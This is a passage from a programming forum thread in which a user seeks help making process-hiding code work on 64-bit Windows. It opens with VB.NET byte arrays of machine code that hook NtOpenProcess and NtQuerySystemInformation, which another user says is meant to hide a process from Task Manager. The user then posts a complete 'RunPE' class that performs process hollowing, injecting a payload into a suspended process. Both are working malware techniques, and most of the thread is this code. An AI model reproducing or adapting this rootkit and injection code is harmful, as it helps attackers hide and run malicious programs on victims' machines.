        &H0, &H0, &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HFC, &HFF, &H75, &H18, &HFF, _
        &H75, &H14, &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, &H75, &H8, &H8B, &H45, &HFC, &H83, &HC0, _
        &H18, &HFF, &HD0, &H89, &H45, &HF8, &H83, &H7D, &HF8, &H0, &HF, &H8C, &HA8, &H0, &H0, &H0, _
        &HFF, &H75, &H8, &H8B, &H45, &HFC, &HFF, &H10, &H8B, &HF0, &H8B, &H45, &HFC, &HFF, &H50, &H4, _
        &H3B, &HF0, &H74, &HA, &H83, &H7D, &H8, &HFF, &HF, &H85, &H8A, &H0, &H0, &H0, &H83, &H65, _
        &HF4, &H0, &HEB, &H7, &H8B, &H45, &HF4, &H40, &H89, &H45, &HF4, &H83, &H7D, &HF4, &H3, &H73, _
        &H77, &H8B, &H45, &HF4, &H8B, &H4D, &HFC, &H83, &H7C, &H81, &HC, &H0, &H74, &H65, &H8B, &H45, _
        &HF4, &H8B, &H4D, &HFC, &H8B, &H44, &H81, &HC, &H3B, &H45, &HC, &H72, &H56, &H8B, &H45, &HC, _
        &H3, &H45, &H14, &H8B, &H4D, &HF4, &H8B, &H55, &HFC, &H39, &H44, &H8A, &HC, &H73, &H44, &H8B, _
        &H45, &HF4, &H8B, &H4D, &HFC, &H8B, &H44, &H81, &HC, &H2B, &H45, &HC, &H89, &H45, &HF0, &H83, _
        &H65, &HEC, &H0, &HEB, &H7, &H8B, &H45, &HEC, &H40, &H89, &H45, &HEC, &H83, &H7D, &HEC, &H18, _
        &H73, &H21, &H8B, &H45, &HF4, &H6B, &HC0, &H18, &H8B, &H4D, &HFC, &H8D, &H44, &H1, &H18, &H8B, _
        &H4D, &HEC, &H3, &H4D, &HF0, &H8B, &H55, &H10, &H8B, &H75, &HEC, &H8A, &H4, &H30, &H88, &H4, _
        &HA, &HEB, &HD2, &HE9, &H7C, &HFF, &HFF, &HFF, &H8B, &H45, &HF8, &H5E, &HC9, &HC2, &H14, &H0}
    
        Private NtOpenProcess_AsmOpCode As Byte() = { _
        &H55, &H8B, &HEC, &H51, &H51, &HC7, &H45, &HF8, &H1, &H0, &H0, &HC0, &HE8, &H0, &H0, &H0, _
        &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HFC, &H83, &H7D, &H14, &H0, &H74, &H16, _
        &H8B, &H45, &H14, &H8B, &H4D, &HFC, &H8B, &H0, &H3B, &H41, &H8, &H75, &H9, &HC7, &H45, &HF8, _
        &H22, &H0, &H0, &HC0, &HEB, &H17, &HFF, &H75, &H14, &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, _
        &H75, &H8, &H8B, &H45, &HFC, &H83, &HC0, &H30, &HFF, &HD0, &H89, &H45, &HF8, &H8B, &H45, &HF8, _
        &HC9, &HC2, &H10, &H0}
    
        Private NtQuerySystemInformation_AsmOpCode As Byte() = { _
        &H55, &H8B, &HEC, &H83, &HEC, &H1C, &H56, &H57, &HC7, &H45, &HEC, &H1, &H0, &H0, &HC0, &HE8, _
        &H0, &H0, &H0, &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HF0, &HFF, &H75, &H14, _
        &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, &H75, &H8, &H8B, &H45, &HF0, &H83, &HC0, &H48, &HFF, _
        &HD0, &H89, &H45, &HEC, &H83, &H7D, &HEC, &H0, &HF, &H8C, &H4E, &H1, &H0, &H0, &H83, &H7D, _
        &H8, &H5, &H75, &H5D, &H83, &H65, &HF8, &H0, &H8B, &H45, &HC, &H89, &H45, &HF4, &H8B, &H45, _
        &HF4, &H83, &H38, &H0, &H74, &H46, &H8B, &H45, &HF4, &H89, &H45, &HF8, &H8B, &H45, &HF8, &H8B, _
        &H4D, &HF8, &H3, &H8, &H89, &H4D, &HF4, &H8B, &H45, &HF4, &H8B, &H4D, &HF0, &H8B, &H40, &H44, _
        &H3B, &H41, &H8, &H75, &H25, &H8B, &H45, &HF4, &H83, &H38, &H0, &H75, &H8, &H8B, &H45, &HF8, _
        &H83, &H20, &H0, &HEB, &HF, &H8B, &H45, &HF8, &H8B, &H0, &H8B, &H4D, &HF4, &H3, &H1, &H8B, _
        &H4D, &HF8, &H89, &H1, &H8B, &H45, &HF8, &H89, &H45, &HF4, &HEB, &HB2, &HE9, &HEB, &H0, &H0, _
        &H0, &H83, &H7D, &H8, &H10, &HF, &H85, &HE1, &H0, &H0, &H0, &H8B, &H45, &HC, &H89, &H45, _
        &HFC, &H83, &H65, &HE8, &H0, &HEB, &H7, &H8B, &H45, &HE8, &H40, &H89, &H45, &HE8, &H8B, &H45, _
        &HFC, &H8B, &H4D, &HE8, &H3B, &H8, &HF, &H83, &HC0, &H0, &H0, &H0, &H8B, &H45, &HE8, &HC1, _
        &HE0, &H4, &H8B, &H4D, &HFC, &H8B, &H55, &HF0, &H8B, &H44, &H1, &H4, &H3B, &H42, &H8, &HF, _
        &H85, &HA2, &H0, &H0, &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &HC6, &H44, _
        &H1, &H9, &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &H10, _
        &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H33, &HC9, &H8B, &H55, &HFC, &H66, &H89, &H4C, &H2, _
        &HA, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &HC, &H0, &H8B, _
        &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &HC6, &H44, &H1, &H8, &H0, &H8B, &H45, &HE8, _
        &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &H4, &H0, &H8B, &H45, &HE8, &H89, &H45, _
        &HE4, &HEB, &H7, &H8B, &H45, &HE4, &H40, &H89, &H45, &HE4, &H8B, &H45, &HFC, &H8B, &H4D, &HE4, _
        &H3B, &H8, &H73, &H21, &H8B, &H45, &HE4, &H40, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H8D, &H74, _
        &H1, &H4, &H8B, &H45, &HE4, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H8D, &H7C, &H1, &H4, &HA5, _
        &HA5, &HA5, &HA5, &HEB, &HCE, &H8B, &H45, &HFC, &H8B, &H0, &H48, &H8B, &H4D, &HFC, &H89, &H1, _
        &H8B, &H45, &HE8, &H48, &H89, &H45, &HE8, &HE9, &H2B, &HFF, &HFF, &HFF, &H8B, &H45, &HEC, &H5F, _
        &H5E, &HC9, &HC2, &H10, &H0}
    
    #End Region
    
    End Module

    Friday, June 23, 2017 1:01 AM
  • but he just work on 32bit, can you edit it to work on 64bit?

    No,  you  can't edit a 32bit version to run on 64bit machine. You can drop a 32bit executable in the Wow64 so the 32bit version can run on a 64bit machine.

    Friday, June 23, 2017 1:17 AM
  • Hi KORG,

    According to your description, your issue is more related about VB.NET. And this forum is discussing and asking questions about the Windows Form and ClickOnce, I will move this thread to corresponding forum: VB.NET Forum for dedicated information.

    You will get a more professional support from there, thank you for your understanding.

    Best Regards,

    Stanly


    MSDN Community Support
    Please remember to click "Mark as Answer" the responses that resolved your issue, and to click "Unmark as Answer" if not. This can be beneficial to other community members reading this thread. If you have any compliments or complaints to MSDN Support, feel free to contact MSDNFSF@microsoft.com.

    Friday, June 23, 2017 2:05 AM
  • So in another post you want to hide the path and here you want to hide from Task Manager. At first I thought sneaky, now I would say you are up to no good.
    • Proposed as answer by tommytwotrain Friday, June 23, 2017 9:36 AM
    Friday, June 23, 2017 6:19 AM
  • can you give me example how to edit my code and use Wow64 to work on 64bit

    Private Delegate Function IsWow64ProcessParameters( _
        ByVal hProcess As IntPtr, _
        ByRef Wow64Process As Boolean) As Boolean


    Friday, June 23, 2017 7:06 AM
  • but he just work on 32bit, can you edit it to work on 64bit?

    No,  you  can't edit a 32bit version to run on 64bit machine. You can drop a 32bit executable in the Wow64 so the 32bit version can run on a 64bit machine.

    and i found this class RunPE work on 64 & 32 can you see it

    Class MenaPE
    
        '------------------------------
        'Title: MenaPE (RunPE Class)
        'Author: Menalix
        'Website: Menalix.com
        'Notice: For teaching purposes
        '------------------------------
    
    #Region "Static API Calls"
    
        Declare Function LoadLibraryA Lib "kernel32" (ByVal Name As String) As IntPtr
        Declare Function GetProcAddress Lib "kernel32" (ByVal hProcess As IntPtr, ByVal Name As String) As IntPtr
    #End Region
    
    #Region "Dynamic API Caller"
    
        Private Function CreateApi(Of T)(ByVal Name As String, ByVal Method As String) As T
            Return DirectCast(DirectCast(Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(Name), Method), GetType(T)), Object), T)
        End Function
    
    #End Region
    
    #Region "Dynamic API's"
    
        Private Delegate Function ReadProcessMemoryParameters(ByVal hProcess As UInteger, ByVal lpBaseAddress As IntPtr, ByRef lpBuffer As Integer, ByVal nSize As IntPtr, ByRef lpNumberOfBytesWritten As IntPtr) As Boolean
        ReadOnly ReadProcessMemory As ReadProcessMemoryParameters = CreateApi(Of ReadProcessMemoryParameters)("kernel32", "ReadProcessMemory")
    
        Private Delegate Function CreateProcessParameters( _
        ByVal ApplicationName As String, _
        ByVal CommandLine As String, _
        ByVal ProcessAttributes As IntPtr, _
        ByVal ThreadAttributes As IntPtr, _
        ByVal InheritHandles As Boolean, _
        ByVal CreationFlags As UInteger, _
        ByVal Environment As IntPtr, _
        ByVal CurrentDirectory As String, _
        ByRef StartupInfo As STARTUPINFO, _
        ByRef ProcessInformation As PROCESS_INFORMATION) As Boolean
        Dim CreateProcess As CreateProcessParameters = CreateApi(Of CreateProcessParameters)("kernel32", "CreateProcessA")
    
        Private Delegate Function NtQueryInformationProcessParameters(ByVal hProcess As IntPtr, _
        ByVal ProcessInformationClass As Integer, _
        ByRef ProcessInformation As PROCESS_BASIC_INFORMATION, _
        ByVal ProcessInformationLength As UInteger, _
        ByRef ReturnLength As UIntPtr) As UInteger
        ReadOnly NtQueryInformationProcess As NtQueryInformationProcessParameters = CreateApi(Of NtQueryInformationProcessParameters)("ntdll", "NtQueryInformationProcess")
    
        Private Delegate Function GetThreadContext64Parameters( _
        ByVal hThread As IntPtr, _
        ByRef lpContext As CONTEXT32) As Boolean
        Dim GetThreadContext64 As GetThreadContext64Parameters = Nothing
    
        Private Delegate Function IsWow64ProcessParameters( _
        ByVal hProcess As IntPtr, _
        ByRef Wow64Process As Boolean) As Boolean
        ReadOnly IsWow64Process As IsWow64ProcessParameters = CreateApi(Of IsWow64ProcessParameters)("kernel32", "IsWow64Process")
    
        Private Delegate Function WriteProcessMemoryParameters( _
        ByVal hProcess As IntPtr, _
        ByVal lpBaseAddress As IntPtr, _
        ByVal lpBuffer As Byte(), _
        ByVal nSize As UInteger, _
        ByRef lpNumberOfBytesWritten As UInteger) As Boolean
        ReadOnly WriteProcessMemory As WriteProcessMemoryParameters = CreateApi(Of WriteProcessMemoryParameters)("kernel32", "WriteProcessMemory")
    
        Private Delegate Function NtUnmapViewOfSectionParameters( _
        ByVal hProcess As IntPtr, _
        ByVal pBaseAddress As IntPtr) As UInteger
        ReadOnly NtUnmapViewOfSection As NtUnmapViewOfSectionParameters = CreateApi(Of NtUnmapViewOfSectionParameters)("ntdll", "NtUnmapViewOfSection")
    
        Private Delegate Function VirtualAllocExParameters( _
        ByVal hProcess As IntPtr, _
        ByVal lpAddress As IntPtr, _
        ByVal dwSize As UInteger, _
        ByVal flAllocationType As UInteger, _
        ByVal flProtect As UInteger) As IntPtr
        ReadOnly VirtualAllocEx As VirtualAllocExParameters = CreateApi(Of VirtualAllocExParameters)("kernel32", "VirtualAllocEx")
    
        Private Delegate Function ResumeThreadParameters( _
        ByVal hThread As IntPtr) As UInteger
        ReadOnly ResumeThread As ResumeThreadParameters = CreateApi(Of ResumeThreadParameters)("kernel32", "ResumeThread")
    
    #End Region
    
    #Region "API Structures"
        Private Structure PROCESS_INFORMATION
            Public hProcess As IntPtr
            Public hThread As IntPtr
            Public dwProcessId As UInteger
            Public dwThreadId As UInteger
        End Structure
        Private Structure STARTUPINFO
            Public cb As UInteger
            Public lpReserved As String
            Public lpDesktop As String
            Public lpTitle As String
            <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=36)> _
            Public Misc As Byte()
            Public lpReserved2 As Byte
            Public hStdInput As IntPtr
            Public hStdOutput As IntPtr
            Public hStdError As IntPtr
        End Structure
        Structure FLOATING_SAVE_AREA
            Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
            <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()
            Dim State As UInteger
        End Structure
        Structure CONTEXT32
            Dim ContextFlags, Dr0, Dr1, Dr2, Dr3, Dr6, Dr7 As UInteger
            Dim FloatSave As FLOATING_SAVE_AREA
            Dim SegGs, SegFs, SegEs, SegDs, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SegCs, EFlags, Esp, SegSs As UInteger
            <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=512)> Dim ExtendedRegisters As Byte()
        End Structure
        Structure PROCESS_BASIC_INFORMATION
            Public ExitStatus As IntPtr
            Public PebBaseAddress As IntPtr
            Public AffinityMask As IntPtr
            Public BasePriority As IntPtr
            Public UniqueProcessID As IntPtr
            Public InheritedFromUniqueProcessId As IntPtr
        End Structure
    #End Region
    
    #Region "Injection"
    
        Public Function Run(ByVal path As String, ByVal payload As Byte(), ByVal creationflag As Integer) As Boolean
            For I As Integer = 1 To 5
                If HandleRun(path, payload, creationflag) Then Return True
            Next
            Return False
        End Function
    
        Private Function HandleRun(ByVal Path As String, ByVal payload As Byte(), ByVal creationflag As Integer) As Boolean
            Dim ReadWrite As Integer = Nothing
            Dim QuotedPath As String = String.Format("""{0}""", Path)
    
            Dim SI As New STARTUPINFO
            Dim PI As New PROCESS_INFORMATION
    
            SI.cb = CUInt(Runtime.InteropServices.Marshal.SizeOf(GetType(STARTUPINFO))) 'Parses the size of the structure to the structure, so it retrieves the right size of data
    
            Try
                'COMMENT: Creating a target process in suspended state, which makes it patch ready and we also retrieves its process information and startup information.
                If Not CreateProcess(Path, QuotedPath, IntPtr.Zero, IntPtr.Zero, True, creationflag, IntPtr.Zero, IO.Directory.GetCurrentDirectory, SI, PI) Then Throw New Exception()
    
                'COMMENT: Defines some variables we need in the next process
                Dim ProccessInfo As New PROCESS_BASIC_INFORMATION
                Dim RetLength As UInteger
                Dim Context = Nothing
                Dim PEBAddress32 As Integer = Nothing
                Dim PEBAddress64 As Int64 = Nothing
                Dim TargetIs64 As Boolean = Nothing
                Dim IsWow64Proc As Boolean = False
    
                IsWow64Process(PI.hProcess, IsWow64Proc) 'COMMENT: Retrieves Boolean to know if target process is a 32bit process running in 32bit system, or a 32bit process running under WOW64 in a 64bit system.
                If IsWow64Proc Or IntPtr.Size = 4 Then 'COMMENT: Checks the Boolean retrieved from before OR checks if our calling process is 32bit
                    Context = New CONTEXT32
                    Context.ContextFlags = &H1000002L 'COMMENT: Parses the context flag CONTEXT_AMD64(&H00100000L) + CONTEXT_INTEGER(0x00000002L) to tell that we want a structure of a 32bit process running under WOW64, you can see all context flags in winnt.h header file.
                    If IsWow64Proc AndAlso IntPtr.Size = 8 Then 'COMMENT: Checks if our own process is 64bit and the target process is 32bit in wow64
                        GetThreadContext64 = CreateApi(Of GetThreadContext64Parameters)("kernel32", "Wow64GetThreadContext") 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
                        If Not GetThreadContext64(PI.hThread, Context) Then Throw New Exception
                        Console.WriteLine(Context.Ebx)
                        PEBAddress32 = Context.Ebx
                        TargetIs64 = False
                    Else 'COMMENT: If our process is 32bit and the target process is 32bit we get here. 
                        NtQueryInformationProcess(PI.hProcess, 0, ProccessInfo, Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength) 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
                        PEBAddress32 = ProccessInfo.PebBaseAddress
                        TargetIs64 = False
                    End If
                Else 'COMMENT: If our process is 64bit and the target process is 64bit we get here. 
                    NtQueryInformationProcess(PI.hProcess, 0, ProccessInfo, Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength) 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
                    PEBAddress64 = ProccessInfo.PebBaseAddress
                    TargetIs64 = True
                End If
    
    
                Dim BaseAddress As IntPtr
                If TargetIs64 = True Then
                    ReadProcessMemory(PI.hProcess, PEBAddress64 + &H10, BaseAddress, 4, ReadWrite) 'COMMENT: Reads the BaseAddress of a 64bit Process, which is where the exe data starts
                Else
                    ReadProcessMemory(PI.hProcess, PEBAddress32 + &H8, BaseAddress, 4, ReadWrite) 'COMMENT: Reads the BaseAddress of a 32bit Process, which is where the exe data starts
                End If
    
                Dim PayloadIs64 As Boolean = False
                Dim dwPEHeaderAddress As Integer = BitConverter.ToInt32(payload, &H3C) 'COMMENT: Gets the PEHeader start address
                Dim dwNetDirFlags As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H398) 'COMMENT: Gets the .NET Header Flags value to determine if its a AnyCPU Compiled exe or not
                Dim wMachine As Integer = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H4) 'COMMENT: Gets the reads the Machine value
    
                If wMachine = 8664 Then : PayloadIs64 = True 'Checks the Machine value to know if payload is 64bit or not"
                Else : PayloadIs64 = False : End If
    
                If PayloadIs64 = False Then
                    If dwNetDirFlags = &H3 Then 'To make sure we don't rewrite flags on a Payload which is already AnyCPU Compiled, it will only slow us down
                        Buffer.SetByte(payload, dwPEHeaderAddress + &H398, &H1) 'Replaces the .NET Header Flag on a 32bit compiled payload, to make it possible doing 32bit -> 64bit injection
                    End If
                End If
    
                Dim dwImageBase As Integer
                If PayloadIs64 = True Then
                    dwImageBase = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H30) 'Reads the ImageBase value of a 64bit payload, it's kind of unnessecary as ImageBase should always be: &H400000, this is the virtual addressstart location for our exe in its own memory space
                Else
                    dwImageBase = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H34) 'Reads the ImageBase value of a 32bit payload, it's kind of unnessecary as ImageBase should always be: &H400000, this is the virtual address start location for our exe in its own memory space
                End If
    
                If dwImageBase = BaseAddress Then 'COMMENT: If the BaseAddress of our Exe is matching the ImageBase, it's because it's mapped and we have to unmap it
                    If Not NtUnmapViewOfSection(PI.hProcess, BaseAddress) = 0 Then Throw New Exception() 'COMMENT: Unmapping it
                End If
    
                Dim dwSizeOfImage As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H50)
                Dim dwNewImageBase As Integer = VirtualAllocEx(PI.hProcess, dwImageBase, dwSizeOfImage, &H3000, &H40) 'COMMENT: Makes the process ready to write in by specifying how much space we need to do it and where we need it
                If dwNewImageBase = 0 Then Throw New Exception()
    
                Dim dwSizeOfHeaders As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H54)
                If Not WriteProcessMemory(PI.hProcess, dwNewImageBase, payload, dwSizeOfHeaders, ReadWrite) Then Throw New Exception() 'Writes the size of the payloads PE header to the target
    
                'COMMENT: This is here where most of the magic happens. We write in all our sections data, which contains our resssources, code and the information to utilize the sections: VirtualAddress, SizeOfRawData and PointerToRawData
                Dim SizeOfOptionalHeader As Short = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H14)
                Dim SectionOffset As Integer = dwPEHeaderAddress + (&H16 + SizeOfOptionalHeader + &H2)
                Dim NumberOfSections As Short = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H6)
                For I As Integer = 0 To NumberOfSections - 1
                    Dim VirtualAddress As Integer = BitConverter.ToInt32(payload, SectionOffset + &HC)
                    Dim SizeOfRawData As Integer = BitConverter.ToInt32(payload, SectionOffset + &H10)
                    Dim PointerToRawData As Integer = BitConverter.ToInt32(payload, SectionOffset + &H14)
                    If Not SizeOfRawData = 0 Then
                        Dim SectionData(SizeOfRawData - 1) As Byte
                        Buffer.BlockCopy(payload, PointerToRawData, SectionData, 0, SectionData.Length)
                        If Not WriteProcessMemory(PI.hProcess, dwNewImageBase + VirtualAddress, SectionData, SectionData.Length, ReadWrite) Then Throw New Exception()
                    End If
                    SectionOffset += &H28
                Next
    
                Dim PointerData As Byte() = BitConverter.GetBytes(dwNewImageBase)
                If TargetIs64 = True Then
                    If Not WriteProcessMemory(PI.hProcess, PEBAddress64 + &H10, PointerData, 4, ReadWrite) Then Throw New Exception() 'Writes the new etrypoint for 64bit target
                Else
                    If Not WriteProcessMemory(PI.hProcess, PEBAddress32 + &H8, PointerData, 4, ReadWrite) Then Throw New Exception() 'Writes the new entrypoint for 32bit target
                End If
                If ResumeThread(PI.hThread) = -1 Then Throw New Exception() 'Resumes the suspended target with all its new exciting data
    
            Catch ex As Exception
                Dim P As Process = Process.GetProcessById(CInt(PI.dwProcessId))
                If P IsNot Nothing Then P.Kill()
                Return False
            End Try
    
            Return True
        End Function
    #End Region
    
    End Class

    Friday, June 23, 2017 7:10 AM